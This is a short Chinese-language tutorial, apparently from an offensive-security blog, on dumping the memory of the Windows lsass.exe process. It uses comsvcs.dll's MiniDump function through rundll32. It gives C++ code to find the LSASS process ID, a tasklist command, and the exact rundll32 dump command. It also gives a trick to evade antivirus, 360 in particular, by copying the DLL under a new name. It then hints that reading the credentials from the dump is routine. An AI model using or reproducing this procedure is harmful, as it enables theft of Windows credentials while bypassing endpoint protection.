簡介
comsvcs.dll,在系統崩潰時轉儲進程內存的系統窗口和系統32,通過rundll32編寫,該dll包含函數MiniDumpW
實際使用
用api調或者看進程都可以
此處需要獲得lsass.exe的pid
#include<Windows.h>
#include<Tlhelp32.h>
#include<stdio.h>
#include <iostream>
using namespace std;
int getpid() {
DWORD lsassPID = 0;
LPCWSTR processName = L"";
PROCESSENTRY32 processEntry;
processEntry.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapShot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (Process32First(hSnapShot, &processEntry)) {
while (_wcsicmp(processName, L"lsass.exe") != 0)
{
Process32Next(hSnapShot, &processEntry);
processName = processEntry.szExeFile;
lsassPID = processEntry.th32ProcessID;
}
wcout << "[+] Got lsass.exe PID: " << lsassPID << endl;
}
return 0;
}
int main() {
getpid();
}
通過tasklist也可以
tasklist | findstr lsass.exe
在有360&火絨的情況下直接沖是會被擋的(火絨無反應)
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 508 lsass.dmp full
想想繞過,拷貝下dll,再出來就不擋了
copy C:\windows\System32\comsvcs.dll yyyang.dll
rundll32.exe yyyang.dll, MiniDump 508 lsass.dmp full
然后怎么讀大家應該都會
